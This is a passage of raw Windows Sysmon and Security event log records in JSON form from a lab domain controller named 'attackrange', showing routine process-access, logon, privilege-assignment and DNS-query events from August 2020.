08:03:06.351","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 08:03:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220686,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9A8CB\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9a8cb","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:03:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220687,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x9A8CB\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{030FAB5D-6149-C8FF-0110-0B09942348E9}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50221\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x9a8cb","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{030FAB5D-6149-C8FF-0110-0B09942348E9}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50221","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:03:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6357,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:07.820\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 3804\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:07.820","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"3804","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6358,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:07.820\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 3804\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:07.820","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"3804","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":6359,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:06.229\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010C2C20000}\r\nProcessId: 1220\r\nQueryName: WIN-DC-6178966\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 08:03:06.229","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010C2C20000}","QueryName":"WIN-DC-6178966","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6360,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6361,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6362,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6363,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 